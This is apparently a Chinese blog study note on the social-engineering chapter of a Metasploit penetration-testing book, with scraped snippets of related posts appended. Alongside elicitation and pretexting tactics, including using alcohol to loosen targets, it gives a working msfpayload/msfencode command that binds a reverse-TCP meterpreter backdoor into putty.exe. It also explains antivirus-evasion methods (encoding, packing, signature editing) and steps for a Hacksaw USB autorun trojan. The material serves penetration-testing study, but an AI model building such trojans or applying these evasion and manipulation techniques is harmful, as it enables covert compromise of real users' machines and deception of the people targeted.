《metasploit渗透测试魔鬼训练营》学习笔记第七章--社会工程学

五.社工工程学

5.1社会工程系框架

5.1.1信息搜集

maltego是一个高度自动化的信息搜集工具,集成在BT5中,如果国内网络环境使用时无法获取结果,可能是无法与信息提供网站建立连接,可以使用VPN或代理服务器。

5.1.2诱导

1.提高诱导能力

表现自然,学习知识,不要贪心。

2.成功诱导的技巧

迎合目标的自我感觉

表达共同的兴趣

故意给出一个错误的陈述

抛出一些诱饵信息以寻求回报

假装知晓

借助酒精的威力,让目标更容易开口

3.问答的种类

开放式问答:无法只用“是”或“否”来回答问题

封闭式问答:回答比较确定

诱导性问答:组合了开放式和封闭式,期望诱导出一些回答信息

假设性问答:假设目标已经知晓某种信息

5.1.3托辞

设计一个虚构的场景来说服目标泄露信息。

1.提升设计托辞的能力

托辞的质量与信息搜集和诱导得到的信息密切相关。实践,实践!

2.设计托辞的原则

研究功课做得越充分,成功的概率越大

发挥你的个人兴趣或专长

联习方言和表达

充分利用电话

托辞设计越简单越好

让托辞看起来更自然

向目标提供一个合乎逻辑的结论。

5.2社会工程学案例--伪装木马

木马常见的伪装方式:

伪装成不可执行文件的图标

捆绑文件伪装

组合伪装

5.2.1木马程序的制作

制作一个木马,主要考虑以下三点:

①确定监听的IP和端口,木马需要回连这个IP的端口。

②把木马绑到一个合法程序上。

③木马植入后,迁移到不会关闭的进程上。

还要考虑木马的稳定性,兼容性,免杀等等。

1.使用metasploit中的msfpayload功能生成基本的攻击载荷程序

msfpayload -l |grep ‘windows‘|grep ‘reverse_tcp’|grep ‘meterpreter‘

-l用来列出攻击载荷,grep命令来查询所需要的攻击载荷模块。

在实际应用中建议修改回连监听端口为80,53等常用端口。

2.将攻击载荷绑定到Putty程序

msfpayload主要功能是将payload包装成一个可执行文件,或包装指定格式输出。用法如下:

执行msfpayload -h查看都有哪些参数:

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h        Help banner

-l        List available payloads

#O--查看payload信息

#R--输出raw原始数据,可以被传输到另一个程序如msfencode或重定向到另一个文件

#C--输出c程序

msfencode主要功能是对输入的数据继续编码,然后将编码后的数据包装成一个指定文件。用法如下:

Usage: /opt/metasploit/msf3/msfencode <options>

OPTIONS:

-a <opt>  The architecture to encode as

-b <opt>  The list of characters to avoid: ‘\x00\xff‘ //避免的字符

-c <opt>  The number of times to encode the data  //编码次数

-d <opt>  Specify the directory in which to look for EXE templates

-e <opt>  The encoder to use  //选择使用哪种编码器

-h        Help banner

-i <opt>  Encode the contents of the supplied file path

-k        Keep template working; run payload in new thread (use with -x)

-l        List available encoders  //列出所有可用的编码器

-m <opt>  Specifies an additional module search path

-n        Dump encoder information

-o <opt>  The output file  //输出文件

-p <opt>  The platform to encode for

-s <opt>  The maximum size of the encoded data

-t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war  //输出文件的格式

-v        Increase verbosity

-x <opt>  Specify an alternate executable template

3.制作木马程序

msfpayload /windows/meterpreter/reverse_tcp  LHOST=10.0.0.1 LPORT=80 R | msfencode -t exe -e x86/alpha_mixed -k -x /root/netcat/putty.exe -t elf -o dood_putty.exe -c 5

新生成的door_putty.exe就是木马后门了。

5.2.2木马的免杀处理

1.加密免杀

可以使用多重编码技术增强伪装木马的免杀能力,但是复杂的组合可能导致编码后的程序无法正常运行

2.加壳免杀

可以使用一些加壳工具对恶意代码进行加壳处理,比如UPX等

3.修改特征码免杀

大部分杀毒软件的根据就是对比特征码,对比硬盘中储存的文件的特征码,能全面地查杀,对比在内存中储存的文件特征码,可以快速的查杀,针对这一特性,可以用特征码定位软件定位文件特征码的所在之处,在用UltraEdit对被修改的特征码进行修改。一般的修改方法有:

十六进制的数据特征码直接修改法

字符串大小写修改法

等价替换法  把对应的汇编指令替换成功能类似的指令

指令顺序调换法

通用跳转法

修改特征码的方法针对性很强,但只能针对一款杀毒软件,因为各家杀毒软件的特征码不一样。

5.3社工攻击工具包SET

可进行制作钓鱼网站,钓鱼邮件等等,功能强大,

5.4U盘 Hacksaw攻击

向U盘写入木马程序,然后修改autorun.inf文件,让其指向木马安装程序,那么windows会运行这个程序。

一些隐藏木马的方式:

作为系统文件隐藏

伪装成其他文件

藏于系统文件夹中

运用windows漏洞建立路径不存在或者打不开的文件夹

制作Hacksaw U盘

Hacksaw是使用U盘进行攻击的软件,具体步骤如下:

1.下载安装工具UltraISO

2.下载Hcaksaw

3.解压下载的压缩包到一个单独目录

4.插入U盘

5.启动UltraISO,并打开先前解压后目录下的cruzer-autorun.iso

6.点击启动,写入硬盘映像

7.选择U盘并写入

8.把payload目录下的隐藏木马WIP及攻击载荷复制到准备好的U盘的跟目录下

9.修改WIP/SBS目录下的send.sat文件

10.需要autorun.inf文件  把shellexecute替换open

11.升级stunnel软件

12.把autorun.inf和go.vbe修改为隐藏文件

时间: 2024-10-15 03:29:02

《metasploit渗透测试魔鬼训练营》学习笔记第七章--社会工程学的相关文章

Metasploit 渗透测试魔鬼训练营读书笔记(连续更新一)

1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防战术与作战能力.在信息科技的发源地--美国的军事演习中,将美军称为"蓝军",将假想敌称为"红军",而这种军事演习的方式也在20世纪90年代时,由美国军方与国家安全局引入到对信息网络与信息安全基础设施的实际攻防测试过程中.由一群受过职业训练的安全专家作为"红队"(Red Team),对接受测试的防御方"蓝队

Metasploit渗透测试魔鬼训练营

首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想. 本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写.内容系统.广泛.有深度,不仅详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,而且深刻揭示了渗透测试平台背后蕴含的思

《metasploit渗透测试魔鬼训练营》学习笔记第四章—web应用渗透

继续来学习metasploit...记好笔记是很重要的,下面开始正文: 二.WEB应用渗透技术 1.WEB应用渗透基础知识 先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查询) Sql注入攻击:大致分为 普通注入和盲注 跨站脚本(XSS): 分为存储型XSS,反射性XSS以及DOM型XSS 跨站伪造请求(CSRF):以XSS方式注入一段脚本,受害者点击该脚本时,脚本伪造受害者发出请求. 会话认证管理缺陷:验证身份的功能存在缺陷. 安全误配置:开发和管理人员的失误导致存在漏洞. 不安全密码存

《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透

四.客户端攻击 客户端攻击与服务端攻击有个显著不同的标识,就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出,而是需要结合一些社会工程学技巧,诱使客户端用户去访问这些恶意数据,间接发生攻击. 4.1客户端渗透攻击的安全防护机制 ①DEP DEP(数据执行保护)基本原理是操作系统通过设置内存页的属性,指明数据所在的内存页为不可执行. ②ASLR ASLR(地址空间布局随机化)是系统在运行程序时,不用固定的基地址加载进程及相关工作库文件. 包括:堆地址的随机化,栈基址的随机化,P

Java学习笔记—第七章 类的深入解析

第七章 类的深入解析 1. 继承 1.1 类继承的方法:在Java中,子类对父类的继承是在类的声明中使用extends关键字来指明的.其一    般格式为:[类修饰符] class <子类名> extends <父类名>{ 类体内容 }.一个类只能直接继承一个    父类,一个父类可以有多个子类. 1.2 成员变量的继承和隐藏:基于父类创建子类时,子类可以继承父类的成员变量和成员方法.但是,     如果在父类和子类中同时声明了一个同名变量,则这两个变量在程序运行时同时存在.即:父

Android学习笔记—第七章 数据解析及读取

第七章 数据解析及读取 网络传输中数据的组织方式:xml.json.http (1)xml:可扩展标记语言 特点:保存少量数据,可跨平台 解析方式:sax.dom.pull a. sax解析: 特点:速度快,占用内存少.事件驱动,不会一次性把所有内容加载到内存中. startElement:元素节点开始 localName:不带前缀的标签名 qName:带前缀的标签名 attributes:节点内的属性和值 <student id ="1"> <name>小明&

《metasploit渗透测试魔鬼训练营》学习笔记第九章--meterpreter

七.强大的meterpreter  7.1再探metasploit的攻击载荷模块     7.1.1典型的攻击载荷模块     metasploit涵盖了各大主流操作系统和平台,其中绝大部分是远程漏洞利用所使用的攻击载荷模块,功能一般是开启远程shell,远程执行命令.     metasploit支持用户将自己的shellcode导入框架中,只需将payload替换成自己的shellcode代码,修改一下描述等基础信息即可.     7.1.2使用攻击载荷模块     search 搜索,查询

《metasploit渗透测试魔鬼训练营》学习笔记第五章--网络服务渗透攻击

三.网络服务渗透攻击 3.1 内存攻防技术 3.1.1 缓冲区溢出漏洞机理 缓冲区溢出是程序由于缺乏对缓冲区的边界条件检查而引起的一种异常行为. 一般根据缓冲区溢出的内存位置不同,将缓冲区溢出分为栈溢出和堆溢出. 3.1.2 栈溢出利用原理 栈溢出发生在向栈中写数据时,当数据长度超过栈分配的空间时,就会造成溢出. ①覆盖函数返回地址利用方式 程序一般在执行函数时会把该函数返回地址和函数的调用参数,局部变量一起保存在栈中,这就给了攻击者溢出栈缓冲区从而达到修改函数返回地址的机会. 由于程序每次运行

《metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例Oracle数据库

准备一台BT5作为入侵机,一台win2003作为靶机,靶机上存在着Oracle数据库(版本为10.2.0.1.0)TNS服务的漏洞,该漏洞的编号为CVE-2009-1979. BT5: ip 10.10.10.128 win2003: ip 10.10.10.130 下面开始演练: 在网上找到了关于这一漏洞的一些介绍,metasploit里有利用这个漏洞的模块,首先search这个模块: 进入目录去查看一下这个模块的源代码,找到target,如图: 能看出用了p/p/r的溢出方式,以及不同版本需